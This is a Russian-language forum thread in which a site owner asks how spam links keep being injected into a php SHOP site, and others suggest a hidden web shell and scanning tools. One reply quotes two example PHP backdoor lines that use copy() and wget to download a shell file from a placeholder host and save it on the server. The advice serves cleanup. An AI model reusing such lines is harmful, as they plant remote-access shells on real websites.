Ekliptik 118 Posted May 13, 2014 Report Share Posted May 13, 2014 Приветик Ребятки .. столкнулся тут с такой бедой что на один из моих проектов вешают как то внешние ссылки , файл с ссылками удаляю чуть ли ни каждый день , причем удалял в разных местах кусок кода для подключения их .. но они появляются каждый день .. смс проекта - php SHOP есть идеи может кто сталкивался .. Варианты по смене паролей, и блокировки админки по IP непроканывают .. Link to post Share on other sites
Alex Bang 156 Posted May 13, 2014 Report Share Posted May 13, 2014 Приветик Ребятки .. столкнулся тут с такой бедой что на один из моих проектов вешают как то внешние ссылки , файл с ссылками удаляю чуть ли ни каждый день , причем удалял в разных местах кусок кода для подключения их .. но они появляются каждый день .. смс проекта - php SHOP есть идеи может кто сталкивался .. Варианты по смене паролей, и блокировки админки по IP непроканывают .. наверное трастик балуется и на твоем сайте)) Link to post Share on other sites
Ekliptik 118 Posted May 13, 2014 Author Report Share Posted May 13, 2014 да там непонятно конечно какая биржа .. ссылок около 650 Link to post Share on other sites
iSavage 3 Posted May 13, 2014 Report Share Posted May 13, 2014 Напиши в icq - 1222049 Уверен, что помогу. Link to post Share on other sites
Модератор files 2844 Posted May 13, 2014 Модератор Report Share Posted May 13, 2014 Стучите в контакты, в ЛС. Сталкиваюсь с таким по роду деятельности ежедневно. Link to post Share on other sites
admin37 18 Posted May 13, 2014 Report Share Posted May 13, 2014 ищи дырку. раз каждый день, значит стоит шелл + бэкдор для его восстановления. Link to post Share on other sites
Ekliptik 118 Posted May 13, 2014 Author Report Share Posted May 13, 2014 вся и беда в том что шелл найти не могу Link to post Share on other sites
dimonxaxaxa 99 Posted May 13, 2014 Report Share Posted May 13, 2014 программа ai-bolit заливаешь на сайт, включаешь и она ищет все подозрительные скрипты и указывает место где они, потом ручками удаляешь все скрипты которые тебе не понравятся, меняешь пароли на админку и фтп. Link to post Share on other sites
devioo 69 Posted May 13, 2014 Report Share Posted May 13, 2014 Скорей всего в одном из php файлов прописан бэкдор, через который шелл восстанавливается, попробуйте найти примерно такую строку <?php copy('http://domen.ru/shell.txt','shell.php');exit; ?> или <?php system(wget http://domen.ru/shell.txt -O /home/domen.ru/public_html/);exit; ?> Link to post Share on other sites
VISE 17 Posted May 13, 2014 Report Share Posted May 13, 2014 Закажите для теста на 5 дней хостинг ukraine.com.ua там есть скан всего этого дела. Или можете скинуть подозрительные файлы попробую найти Link to post Share on other sites
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now